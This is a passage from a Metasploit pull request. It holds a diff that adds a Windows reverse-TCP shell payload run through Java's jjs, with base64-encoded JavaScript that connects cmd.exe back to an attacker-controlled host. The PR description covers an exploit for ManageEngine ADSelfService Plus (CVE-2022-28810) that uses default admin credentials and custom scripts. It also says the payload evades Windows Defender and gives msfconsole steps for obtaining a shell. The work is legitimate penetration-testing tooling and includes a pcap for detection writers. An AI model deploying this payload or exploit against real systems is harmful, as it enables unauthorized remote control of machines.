+          ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
+          ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Session' => Msf::Sessions::CommandShell,
+        'PayloadType' => 'cmd',
+        'RequiredCmd' => 'jjs',
+        'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+      )
+    )
+    register_options [
+      OptString.new('SHELL', [ true, 'The shell to execute.', 'cmd.exe' ]),
+      OptString.new('JJS_PATH', [ true, 'The path to JJS.', 'jjs.exe' ])
+    ]
+  end
+
+  def generate
+    return super + command_string
+  end
+
+  def command_string
+    lhost = datastore['LHOST']
+    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+
+    jcode = %{
+      var ProcessBuilder=Java.type("java.lang.ProcessBuilder");
+      var p=new ProcessBuilder("#{datastore['SHELL']}").redirectErrorStream(true).start();
+      var ss=Java.type("java.net.Socket");
+      var s=new ss("#{lhost}",#{datastore['LPORT']});
+      var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
+      var po=p.getOutputStream(),so=s.getOutputStream();
+      while(!s.isClosed()){
+        while(pi.available()>0)so.write(pi.read());
+        while(pe.available()>0)so.write(pe.read());
+        while(si.available()>0)po.write(si.read());
+        so.flush();
+        po.flush();
+        Java.type("java.lang.Thread").sleep(50);
+        try{p.exitValue();break;}catch(e){}
+      };
+      p.destroy();s.close();
+    }
+    minified = jcode.split("\n").map(&:lstrip).join
+
+    %{echo eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}'))); | #{datastore['JJS_PATH']}}
+  end
+end

--- a/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb
@@ -13,7 +13,7 @@ module MetasploitModule
     super(
       merge_info(
         info,
-        'Name' => 'Unix Command Shell, Reverse TCP (via jjs)',
+        'Name' => 'Windows Shell, Reverse TCP (via jjs)',
         'Description' => 'Connect back and create a command shell via jjs',
         'Author' => [
           'conerpirate', # jjs reverse shell


### PR DESCRIPTION
This is an implementation of an attack [Rapid7](https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/) observed in the wild against ManageEngine ADSelfService Plus (ADSSP). Attackers were using the ADSSP's "custom script" functionality to execute arbitrary operating system commands whenever domain users reset their passwords. The "custom script" logic can only be accessed by the `admin` user, but `admin` has a default password (`admin`) that isn't getting changed as often as you'd hope. 

The "custom script" functionality that this module abuses was removed in build 6122 to address CVE-2022-28810. The vendor worded CVE-2022-28810 in such a way that it's unclear if they think the specific behavior this module abuses falls under the umbrella of CVE-2022-28810. But, since my name is associated with the CVE, I'm going to claim some type of authoritative knowledge and say, "Yes, fixing CVE-2022-28810 is in part about preventing arbitrary command execution using custom scripts."

Anyway. There are a few of "interesting" things about this module because isn't there always?

## jjs is good

In the wild, the attacker was executing powershell to download stuff and whatever. Which is fine. But I thought this was a good opportunity to use `jjs` since ADSSP installs Java in tree and we always know where it is relative to our working directory. This was extra interesting because we didn't have a `jjs` reverse shell for Windows, and it is actually a good use for this vulnerability.

So this pull request also adds a reverse shell for Windows using jjs. It's almost entirely a copy and paste of @bcoles work... to the point I didn't take any credit (there were a few minor tweaks but nothing to get all excited about). I enjoy `jjs` because the payload will execute "in memory" ish and Defender still seems not to give a hoot about it so you never have to mess around with builtin Windows AV. I actually published my own [jjs c2](https://github.com/jacob-baines/longtime-sunshine) a number of months before the cited links in the `jjs_reverse_tcp.rb` but I'm sure others did too. Either way, jjs is good. I'm very happy to use jjs here.

There's always the argument that the module should drop meterpeter but this is likely to be the more successful solution

## DisablePayloadHandler

This module sets `DisablePayloadHandler` to true and then starts it's own payload handler (code which was stolen almost wholesale from `windows/local/persistence.rb`). This is a side affect from the module requiring user interaction to execute the payload. The module is set to `passive` so it can wait in the background, but it will simply exit after a brief timeout if using the default payload handler. Hence controlling it's own handler is the solution.

## TARGET_RESET

Exploitation leaves our payload in the custom script form, so I added an option that will simply clean up the target if the user specifies `true`. Again, due to the user interaction nature of this attack, there isn't a great time to clean everything up (it's not as simple as deleting a file), so I figured this was a reasonable solution. :shrug: 

## Default port

By default this thing installs as HTTP on 8888. It can be configured to use HTTPs (9251 by default). I left the default port as 8888 with SSL set to false, but I think it's more likely that exploitable cases will be using HTTPs. Thoughts? Should I switch it over?

I've attached both video and pcap demonstrating exploitation. The video is worth a watch to understand what is happening, probably. The pcap should be useful for all of our signature writing friends (it's HTTP by default :scream:). That's it.

## Verification

List the steps needed to make sure this thing works

- [ ] Follow the setup steps in the documentation
- [ ] Start `msfconsole`
- [ ] use exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810`
- [ ] `set RHOST <ip>`
- [ ] `set LHOST <ip>`
- [ ] `check`
- [ ] Verify the remote host is vulnerable.
- [ ] `run`
- [ ] Verify the module is waiting for a reverse TCP connection
- [ ] Navigate to the ADSelfService Plus web UI and reset your test users password.
- [ ] After a new password has been set, verify the module received a reverse shell.
- [ ] Exit the shell
- [ ] Do `set TARGET_RESET true`
- [ ] Do `run`
- [ ] Navigate to the ADSelfService Plus web UI, log in as admin, and verify that the custom
scripts have been removed and disabled ("Configuration" -> "Self Service" ->
"Policy Configuration" -> "Advanced" -> "Password Sync")

## Video || GTFO

https://www.youtube.com/watch?v=eQxth9FUkJE

## PCAP || GTFO

[manageengine_adssp_reverse_shell.zip](https://github.com/rapid7/metasploit-framework/files/8515239/manageengine_adssp_reverse_shell.zip)
